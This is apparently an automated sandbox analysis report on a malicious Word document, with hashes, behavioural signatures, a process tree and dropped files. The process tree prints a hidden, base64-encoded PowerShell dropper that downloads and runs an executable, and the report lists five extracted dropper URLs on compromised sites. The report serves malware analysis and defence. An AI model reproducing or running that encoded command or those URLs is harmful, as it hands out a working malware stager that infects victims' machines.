Analysis

  • max time kernel
    102s
  • max time network
    129s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250410-en
  • resource tags

    arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15/04/2025, 10:22

General

  • Target

    virusshare/3/VirusShare_6ad036ba93c94d6976e2d93c7a3aec6f.doc

  • Size

    172KB

  • MD5

    6ad036ba93c94d6976e2d93c7a3aec6f

  • SHA1

    cb098f7a0492454a31f3819a1b7ec143c0c507b6

  • SHA256

    4ee0bf78e3b0a06c35fed0f912db6fabbb5fae13f838cd4132634359ad0d24da

  • SHA512

    525d3ccb7078d6c34287307891023a47773cb3ec94d6e5d54a4c2cb4006be5ae3356238e8fe4ce5ff17767b8326af385a2be735dac8dbe78f10c185c665f7a00

  • SSDEEP

    3072:vw2y/GdyrktGDWLS0HZWD5w8K7Nk9pD7IBUaT7jc5Hw:vw2k4jtGiL3HJk9pD7b+jMQ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/

exe.dropper

https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/

exe.dropper

http://homemyland.net/tmp/wUHdeBS/

exe.dropper

https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/

exe.dropper

http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\virusshare\3\VirusShare_6ad036ba93c94d6976e2d93c7a3aec6f.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4836
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3888
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABCAHgAdQBoAGkAaABuAHIAdwBrAHoAbgBiAD0AJwBRAHIAYQBnAGkAcAB4AHcAZwAnADsAJABBAG4AdwBtAGkAdwBiAHUAegBoAHAAIAA9ACAAJwAyADEANgAnADsAJABUAHoAbgBsAG8AaQB5AGoAZgA9ACcASABzAHcAeQBkAGQAdwB5AGcAaQBzAGQAaAAnADsAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHcAbQBpAHcAYgB1AHoAaABwACsAJwAuAGUAeABlACcAOwAkAEEAZwBkAGIAbgBjAHAAYQB0AHMAPQAnAEwAZQBkAGUAYwBsAHYAcwBvAGwAcgB0AHQAJwA7ACQAVwBuAGsAdgB4AHcAYgBhAD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAEMATABpAEUAbgBUADsAJABXAHoAagBsAGkAbABqAGMAZQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHAAcgBvAHIAaQB0AGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQAcwBkAGIAMgA4AGQAZQAtAGsAdwAwAGMAaAAxAG0AcwB2AGkALQAwADAAMwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwBpAGwAdgBlAHMAdABlAHIAaQBuAG0AYQBpAGwAYQBuAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBiAHYAZwB1AHgALQB5AGcANAAtADAAMwA0ADcANQAvACoAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAG0AeQBsAGEAbgBkAC4AbgBlAHQALwB0AG0AcAAvAHcAVQBIAGQAZQBCAFMALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAZQBsAGIAcgBhAC4AYwBvAG0ALgBiAHIALwBvAGwAZAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AMgAwADEAOQAvAG0AYgB3AGwANgAtAGwAdwB1ADAAcABzAG0AYwBiAC0ANQAyADMALwAqAGgAdAB0AHAAOgAvAC8AcAByAGkAaABsAGEAcwBrAGEALgBzAGEAZwBpAHQAdABhAC4AYwB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBXAHcAYwBRAFgAdABSAHQAYQAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABNAHkAYgB3AGYAZQBmAGgAcgA9ACcAUgB0AHMAcwBkAGcAdQBlAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAbABxAHYAcQBnAHMAZgB4AGoAYwByAGEAIABpAG4AIAAkAFcAegBqAGwAaQBsAGoAYwBlACkAewB0AHIAeQB7ACQAVwBuAGsAdgB4AHcAYgBhAC4AIgBEAG8AYABXAG4ATABgAE8AQQBkAEYAaQBsAEUAIgAoACQAWgBsAHEAdgBxAGcAcwBmAHgAagBjAHIAYQAsACAAJABUAG4AcwBlAHIAdABrAGQAegBlAHAAegApADsAJABEAHAAcgBtAG4AdQBvAHAAPQAnAEUAdgBjAGIAcwB2AGQAdABnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQAuACIAbABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADcANgA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAVABuAHMAZQByAHQAawBkAHoAZQBwAHoAKQA7ACQAWQB1AGIAYQB2AGkAbAB6AHAAeQBuAGsAdgA9ACcAVABxAGsAdABiAHcAeABtAHkAJwA7AGIAcgBlAGEAawA7ACQATABrAHIAawBlAHcAcQBlAHIAeABrAD0AJwBHAGUAawBzAGcAaQBzAGYAZwByAGoAZAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAYgBoAGQAbABmAHcAYgBoAGUAPQAnAFUAcgB0AGgAaQBkAGwAbQB4AG0AZQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2288

    Network

    MITRE ATT&CK Enterprise v16

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D968FED2.wmf

      Filesize

      444B

      MD5

      5c3d925410e1b24588ff388572a3ee40

      SHA1

      fb232446a8d1961e88e6faeee9aece4546cc9ef4

      SHA256

      1e889e617fc684362b827afc1fd37ae0f22149e3aa7d539905747e30bca75cda

      SHA512

      13c5f19dc544a268ba1be0a7fefd1ebb32b497ff19e72494bee7d8d61ce9614d2d6e63392fc5cad84c690bb6bf6310111f75a8cee45dcc2b3a830f57f1bf40d4

    • C:\Users\Admin\AppData\Local\Temp\TCD8AEF.tmp\gb.xsl

      Filesize

      262KB

      MD5

      51d32ee5bc7ab811041f799652d26e04

      SHA1

      412193006aa3ef19e0a57e16acf86b830993024a

      SHA256

      6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

      SHA512

      5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpcxu3bd.v01.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      18KB

      MD5

      d76a3e68d0c339fca10337f6227f8c72

      SHA1

      8b0117e4056995725011bc4d4908ffbbf9e63785

      SHA256

      0a028e44b691d1b917798c93fa77e42166902e673274cd4745a8ed0ea845856f

      SHA512

      8af8d69e64aa6fd2a007a493c95dfb1d5f12d51bd1aebb1c5a1eb1db356c10a8801440f554f537e19ffc3ae4b6c0767d31467c7f6fabd7427d2dd4746cc76b8a

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • memory/2288-52-0x000002869B410000-0x000002869B432000-memory.dmp

      Filesize

      136KB

    • memory/4836-4-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-2-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-0-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-10-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-9-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-11-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-12-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-13-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-14-0x00007FFF6E650000-0x00007FFF6E660000-memory.dmp

      Filesize

      64KB

    • memory/4836-15-0x00007FFF6E650000-0x00007FFF6E660000-memory.dmp

      Filesize

      64KB

    • memory/4836-8-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-6-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-7-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-5-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-63-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-64-0x00007FFFB1203000-0x00007FFFB1204000-memory.dmp

      Filesize

      4KB

    • memory/4836-65-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-66-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-67-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-68-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB

    • memory/4836-3-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-1-0x00007FFFB1203000-0x00007FFFB1204000-memory.dmp

      Filesize

      4KB

    • memory/4836-579-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-580-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-582-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-581-0x00007FFF711F0000-0x00007FFF71200000-memory.dmp

      Filesize

      64KB

    • memory/4836-583-0x00007FFFB1160000-0x00007FFFB1369000-memory.dmp

      Filesize

      2.0MB